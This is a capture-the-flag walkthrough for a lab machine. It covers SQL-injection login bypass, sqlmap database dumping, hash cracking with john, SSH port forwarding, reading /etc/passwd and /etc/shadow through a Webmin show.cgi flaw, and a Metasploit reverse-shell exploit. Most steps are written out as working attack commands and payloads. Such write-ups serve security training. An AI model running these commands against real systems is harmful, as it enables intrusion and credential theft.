1.Scanning
We notice that the page includes two ports:
1.SSH (22), 2. HTTP (80)
And Because we don’t have any usernames we can’t brute force or trying to login via ssh
2.Enumeration
A. Access to web page and notice it’s included login form
#when we find login page it means it might vulnerable with sql injection
B. Additional: we can use hydra for brute force this login page but it won’t work
hydra -l admin -P passlist.txt 10.10.10.10 http-post-form “/index.php:username=^USER^&password=^PASS^&x=22&y=16:Incorrect Login” -f
we use manual sql injection in username field and password
the sql inject command is (‘ OR 1=1 — -) in username field
C. We will move to another web page. now we should use sql map to crack the database
We use burp intercept to save the request of search to use it in sql map
Sqlmap -r request.txt –dbms=mysql –dump
#-r uses the intercepted request you saved earlier
— dbms tells SQLMap what type of database management system it is
— dump attempts to outputs the entire database
D. We Decrypt the hash using web site like md5decrypt.net/en/Sha256 or using john the ripper
john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt — format=Raw-SHA256
E. Access to SSH using the user name and password
3.Tunneling
F. View the services that running in in the victim machine by using ss tool
G. ss -tulpn will show us socket connection
we notice that there is port 10000 that running local and can’t be access using our browser so we have to use tunneling
H. SSH have reverse command that we can use it for tunneling
ssh -L 10000:localhost:10000 user@10.10.10.10
it will move the local server to our pc and can access to it by localhost:10000
4.Privilege Escalation
I. Now we have to use this web server for privilege escalation and get root flag
J. When we search about webmin v1.580 we see that it’s include show.cgi that are running as root and also there’s Metasploit exploit that we can use it to run shell
1. We can access to files using this vulnerable by adding to the url /file/show.cgi/xxxx
#xxxx is any directory we want to use it
For example I can see passwd file by typing localhost:10000/file/show.cgi/etc/passwd
Or localhost:10000/file/show.cgi/etc/shadow to see hash of root user
Then we can save them as text file and use this command
unshadow passwd.txt shadow.txt > passwords.txt then use the new file in john
john — wordlist=/usr/../rockyou.txt passwords.txt
2. Or we use it directly to see flag by type localhost:10000/file/show.cgi/root/root.txt
K. Using Metasploit to get shell
1.use exploit/unix/webapp/webmin_show_cgi_exec
2.set options
Rhost localhost
SSL =false
Username and password
Payload = cmd/unix/reverse
And your own lhost and lport
Written By Eng.Saif (eng.saif@protonmail.com)
